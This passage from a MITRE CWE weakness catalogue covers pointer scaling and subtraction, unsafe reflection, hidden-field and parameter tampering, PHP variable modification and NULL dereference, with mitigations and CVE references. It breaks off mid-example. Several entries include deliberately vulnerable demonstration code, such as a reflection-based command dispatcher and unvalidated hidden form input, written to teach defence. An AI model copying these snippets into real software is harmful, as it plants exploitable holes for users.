ARR01-C - Do not apply the sizeof operator to a pointer when taking the size of an array - - - MEM35-C - Allocate sufficient memory for an object - CWE More Abstract - - - SFP10 - Incorrect Buffer Length Computation - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled. - - - - - - - - - - Implementation - Programmers may try to index from a pointer by adding a number of bytes. This is incorrect because C and C++ implicitly scale the operand by the size of the data type. - - - Medium - - - Confidentiality - Integrity - Read Memory - Modify Memory - Incorrect pointer scaling will often result in buffer overflow conditions. Confidentiality can be compromised if the weakness is in the context of a buffer over-read or under-read. - - - - - Architecture and Design - Use a platform with high-level memory abstractions. - - - Implementation - Always use array indexing instead of direct pointer manipulation. - - - Architecture and Design - Use technologies for preventing buffer overflows. - - - - - This example attempts to calculate the position of the second byte of a pointer. - - int *p = x;char * second_char = (char *)(p + 1); - - In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment. - - - - - Unintentional pointer scaling - - - ARR39-C - Do not add or subtract a scaled integer to a pointer - Exact - - - EXP08-C - Ensure pointer arithmetic is used correctly - - - SFP1 - Glitch in computation - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Unintentional Pointer Scaling - - - - The application subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk. - - - - - - - - - - Implementation - - - Medium - - - Access Control - Integrity - Confidentiality - Availability - Modify Memory - Read Memory - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - There is the potential for arbitrary code execution with privileges of the vulnerable program. - - - - - Implementation - Save an index variable. This is the recommended solution. Rather than subtract pointers from one another, use an index variable of the same size as the pointers in question. Use this variable to "walk" from one pointer to the other and calculate the difference. Always validate this number. - - - - - The following example contains the method size that is used to determine the number of nodes in a linked list. The method is passed a pointer to the head of the linked list. - - struct node {int data;struct node* next;}; - - // Returns the number of nodes in a linked list from - - - // the given pointer to the head of the list. - int size(struct node* head) {struct node* current = head;struct node* tail;while (current != NULL) {tail = current;current = current->next;}return tail - head;} - - // other methods for manipulating the list - ... - - - However, the method creates a pointer that points to the end of the list and uses pointer subtraction to determine the number of nodes in the list by subtracting the tail pointer from the head pointer. There no guarantee that the pointers exist in the same memory area, therefore using pointer subtraction in this way could return incorrect results and allow other unintended behavior. In this example a counter should be used to determine the number of nodes in the list, as shown in the following code. - - - ... - int size(struct node* head) {struct node* current = head;int count = 0;while (current != NULL) {count++;current = current->next;}return count;} - - - - - - Improper pointer subtraction - - - ARR36-C - Do not subtract or compare two pointers that do not refer to the same array - Exact - - - SFP1 - Glitch in Computation - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Improper Pointer Subtraction - - - - A software system that accepts path input in the form of leading space (' filedir') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Leading Space - ' filedir' - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Leading Space - ' filedir' - Path Equivalence: ' filename (Leading Space) - - - - The application uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code. - If the application uses external inputs to determine which class to instantiate or which method to invoke, then an attacker could supply values to select unexpected classes or methods. If this occurs, then the attacker could create control flow paths that were not intended by the developer. These paths could bypass authentication or access control checks, or otherwise cause the application to behave in an unexpected manner. This situation becomes a doomsday scenario if the attacker can upload files into a location that appears on the application's classpath (CWE-427) or add new entries to the application's classpath (CWE-426). Under either of these conditions, the attacker can use reflection to introduce new, malicious behavior into the application. - - - - - - - - - - - - - - Reflection Injection - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Availability - Other - Execute Unauthorized Code or Commands - Alter Execution Logic - The attacker might be able to execute code that is not directly accessible to the attacker. Alternately, the attacker could call unexpected code in the wrong place or the wrong time, possibly modifying critical system state. - - - Availability - Other - DoS: Crash, Exit, or Restart - Other - The attacker might be able to use reflection to call the wrong code, possibly with unexpected arguments that violate the API (CWE-227). This could cause the application to exit or hang. - - - Confidentiality - Read Application Data - By causing the wrong code to be invoked, the attacker might be able to trigger a runtime error that leaks sensitive information in the error message, such as CWE-536. - - - - - Architecture and Design - Refactor your code to avoid using reflection. - - - Architecture and Design - Do not use user-controlled inputs to select and load classes or code. - - - Implementation - Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code. - - - - - A common reason that programmers use the reflection API is to implement their own command dispatcher. The following example shows a command dispatcher that does not use reflection: - - String ctl = request.getParameter("ctl");Worker ao = null;if (ctl.equals("Add")) {ao = new AddCommand();}else if (ctl.equals("Modify")) {ao = new ModifyCommand();}else {throw new UnknownActionError();}ao.doAction(request); - - A programmer might refactor this code to use reflection as follows: - - String ctl = request.getParameter("ctl");Class cmdClass = Class.forName(ctl + "Command");Worker ao = (Worker) cmdClass.newInstance();ao.doAction(request); - - The refactoring initially appears to offer a number of advantages. There are fewer lines of code, the if/else blocks have been entirely eliminated, and it is now possible to add new command types without modifying the command dispatcher. However, the refactoring allows an attacker to instantiate any object that implements the Worker interface. If the command dispatcher is still responsible for access control, then whenever programmers create a new class that implements the Worker interface, they must remember to modify the dispatcher's access control code. If they do not modify the access control code, then some Worker classes will not have any access control. - One way to address this access control problem is to make the Worker object responsible for performing the access control check. An example of the re-refactored code follows: - - String ctl = request.getParameter("ctl");Class cmdClass = Class.forName(ctl + "Command");Worker ao = (Worker) cmdClass.newInstance();ao.checkAccessControl(request);ao.doAction(request); - - Although this is an improvement, it encourages a decentralized approach to access control, which makes it easier for programmers to make access control mistakes. This code also highlights another security problem with using reflection to build a command dispatcher. An attacker can invoke the default constructor for any kind of object. In fact, the attacker is not even constrained to objects that implement the Worker interface; the default constructor for any object in the system can be invoked. If the object does not implement the Worker interface, a ClassCastException will be thrown before the assignment to ao, but if the constructor performs operations that work in the attacker's favor, the damage will already have been done. Although this scenario is relatively benign in simple applications, in larger applications where complexity grows exponentially it is not unreasonable that an attacker could find a constructor to leverage as part of an attack. - - - - - CVE-2004-2331 - Database system allows attackers to bypass sandbox restrictions by using the Reflection APi. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2331 - - - - - Unsafe Reflection - - - SEC06-J - Do not use reflection to increase accessibility of classes, methods, or fields - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Alternate_Terms, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Unsafe Reflection - Use of Externally-Controlled Input to Select Classes or Code (aka 'Unsafe Reflection') - - - - The software does not properly protect an assumed-immutable element from being modified by an attacker. - This occurs when a particular input is critical enough to the functioning of the application that it should not be modifiable at all, but it is. Certain resources are often assumed to be immutable when they are not, such as hidden form fields in web applications, cookies, and reverse DNS lookups. - - - - - - - - - Implementation - - - Architecture and Design - - - - - Integrity - Modify Application Data - Common data types that are attacked are environment variables, web application parameters, and HTTP headers. - - - Integrity - Unexpected State - - - - - Architecture and Design - Operation - Implementation - When the data is stored or transmitted through untrusted sources that could modify the data, implement integrity checks to detect unauthorized modification, or store/transmit the data in a trusted location that is free from external influence. - - - - - In the code excerpt below, an array returned by a Java method is modified despite the fact that arrays are mutable. - - String[] colors = car.getAllPossibleColors();colors[0] = "Red"; - - - - - - CVE-2002-1757 - Relies on $PHP_SELF variable for authentication. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1757 - - - CVE-2005-1905 - Gain privileges by modifying assumed-immutable code addresses that are accessed by a driver. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1905 - - - - - Modification of Assumed-Immutable Data - - - - - - - - - - - MAID issues can be primary to many other weaknesses, and they are a major factor in languages that provide easy access to internal program constructs, such as PHP's register_globals and similar features. However, MAID issues can also be resultant from weaknesses that modify internal state; for example, a program might validate some data and store it in memory, but a buffer overflow could overwrite that validated data, leading to a change in program logic. - There are many examples where the MUTABILITY property is a major factor in a vulnerability. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationship_Notes, Theoretical_Notes, Time_of_Introduction - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields. - - If a web product does not properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Web applications often mistakenly make the assumption that data passed to the client in hidden fields or cookies is not susceptible to tampering. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input. - For example, custom cookies commonly store session data or persistent data across sessions. This kind of session data is normally involved in security related decisions on the server side, such as user authentication and access control. Thus, the cookies might contain sensitive data such as user credentials and privileges. This is a dangerous practice, as it can often lead to improper reliance on the value of the client-provided cookie by the server side application. - - - - - - - - - - - Assumed-Immutable Parameter Tampering - - - - - Implementation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Integrity - Modify Application Data - Without appropriate protection mechanisms, the client can easily tamper with cookies and similar web data. Reliance on the cookies without detailed validation can lead to problems such as SQL injection. If you use cookie values for security related decisions on the server side, manipulating the cookies might lead to violations of security policies such as authentication bypassing, user impersonation and privilege escalation. In addition, storing sensitive data in the cookie without appropriate protection can also lead to disclosure of sensitive user data, especially data stored in persistent cookies. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - In this example, a web application uses the value of a hidden form field (accountID) without having done any input validation because it was assumed to be immutable. - - String accountID = request.getParameter("accountID");User user = getUserFromID(Long.parseLong(accountID)); - - - - Hidden fields should not be trusted as secure parameters. - An attacker can intercept and alter hidden fields in a post to the server as easily as user input fields. An attacker can simply parse the HTML for the substring: - - <input type="hidden" - - or even just "hidden". Hidden field values displayed later in the session, such as on the following page, can open a site up to cross-site scripting attacks. - - - - - CVE-2002-0108 - Forum product allows spoofed messages of other users via hidden form fields for name and e-mail address. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0108 - - - CVE-2000-0253 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253 - - - CVE-2000-0254 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0254 - - - CVE-2000-0926 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0926 - - - CVE-2000-0101 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0101 - - - CVE-2000-0102 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102 - - - CVE-2000-0758 - Allows admin access by modifying value of form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0758 - - - CVE-2002-1880 - Read messages by modifying message ID parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1880 - - - CVE-2000-1234 - Send email to arbitrary users by modifying email parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1234 - - - CVE-2005-1652 - Authentication bypass by setting a parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1652 - - - CVE-2005-1784 - Product does not check authorization for configuration change admin script, leading to password theft via modified e-mail address field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1784 - - - CVE-2005-2314 - Logic error leads to password disclosure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2314 - - - CVE-2005-1682 - Modification of message number parameter allows attackers to read other people's messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1682 - - - - - Web Parameter Tampering - - - A4 - Insecure Direct Object Reference - CWE More Specific - - - A1 - Unvalidated Input - CWE More Specific - - - - - - - - - - - - - - This is a primary weakness for many other weaknesses and functional consequences, including XSS, SQL injection, path disclosure, and file inclusion. - This is a technology-specific MAID problem. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Relationship_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Web Parameter Tampering - - - - A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise. - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Modify Application Data - - - - - Requirements - Implementation - Carefully identify which variables can be controlled or influenced by an external user, and consider adopting a naming convention to emphasize when externally modifiable variables are being used. An application should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary. Do not allow your application to run with register_globals enabled. If you implement a register_globals emulator, be extremely careful of variable extraction, dynamic evaluation, and similar issues, since weaknesses in your emulation could allow external variable modification to take place even without register_globals. - - - - - CVE-2000-0860 - File upload allows arbitrary file read by setting hidden form variables to match internal variable names. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0860 - - - CVE-2001-0854 - Mistakenly trusts $PHP_SELF variable to determine if include script was called by its parent. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0854 - - - CVE-2002-0764 - PHP remote file inclusion by modified assumed-immutable variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0764 - - - CVE-2001-1025 - Modify key variable when calling scripts that don't load a library that initializes it. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1025 - - - CVE-2003-0754 - Authentication bypass by modifying array used for authentication. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0754 - - - - - PHP External Variable Modification - - - - - - - This is a language-specific instance of Modification of Assumed-Immutable Data (MAID). This can be resultant from direct request (alternate path) issues. It can be primary to weaknesses such as PHP file inclusion, SQL injection, XSS, authentication bypass, and others. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code uses a function that has inconsistent implementations across operating systems and versions. - - The use of inconsistent implementations can cause changes in behavior when the code is ported or built under a different environment than the programmer expects, which can lead to security problems in some cases. - The implementation of many functions varies by platform, and at times, even by different versions of the same platform. Implementation differences can include: - - - Slight differences in the way parameters are interpreted leading to inconsistent results. - Some implementations of the function carry significant security risks. - The function might not be defined on all platforms. - The function might change which return codes it can provide, or change the meaning of its return codes. - - - - - - - - - Primary - - - Indirect - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Architecture and Design - Requirements - Do not accept inconsistent behavior from the API specifications when the deviant behavior increase the risk level. - - - - - Inconsistent Implementations - - - SFP3 - Use of an improper API - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Inconsistent Implementations - - - - The behavior of this function is undefined unless its control parameter is set to a specific value. - - - - - - Indirect - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Undefined Behavior - - - SFP1 - Glitch in computation - - - - - - - The Linux Standard Base Specification 2.0.1 for libc places constraints on the arguments to some internal functions [21]. If the constraints are not met, the behavior of the functions is not defined. It is unusual for this function to be called directly. It is almost always invoked through a macro defined in a system header file, and the macro ensures that the following constraints are met: The value 1 must be passed to the third parameter (the version number) of the following file system function: __xmknod The value 2 must be passed to the third parameter (the group argument) of the following wide character string functions: __wcstod_internal __wcstof_internal __wcstol_internal __wcstold_internal __wcstoul_internal The value 3 must be passed as the first parameter (the version number) of the following file system functions: __xstat __lxstat __fxstat __xstat64 __lxstat64 __fxstat64 - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Undefined Behavior - - - - A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit. - NULL pointer dereference issues can occur through a number of flaws, including race conditions, and simple programming omissions. - - - - - - - - Resultant - NULL pointer dereferences are frequently resultant from rarely encountered error conditions, since these are most likely to escape detection during the testing phases. - - - - - - - - - - - Implementation - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - NULL pointer dereferences usually result in the failure of the process unless exception handling (on some platforms) is available and implemented. Even when exception handling is being used, it can still be very difficult to return the software to a safe state of operation. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Read Memory - Modify Memory - In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution. - - - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Moderate - - - Manual Dynamic Analysis - Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. - - - - - Implementation - If all pointers that could have been modified are sanity-checked previous to use, nearly all NULL pointer dereferences can be prevented. - - - Requirements - The choice could be made to use a language that is not susceptible to these issues. - - - Implementation - Check the results of all functions that return a value and verify that the value is non-null before acting upon it. - Moderate - Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. This solution does not handle the use of improperly initialized variables (CWE-665). - - - Architecture and Design - Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values. - - - Implementation - Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - - - While there are no complete fixes aside from conscientious programming, the following steps will go a long way to ensure that NULL pointer dereferences do not occur. - - if (pointer1 != NULL) { - - - /* make use of pointer1 */ - - - /* ... */ - - - } - - If you are working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the if statement; and unlock when it has finished. - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - 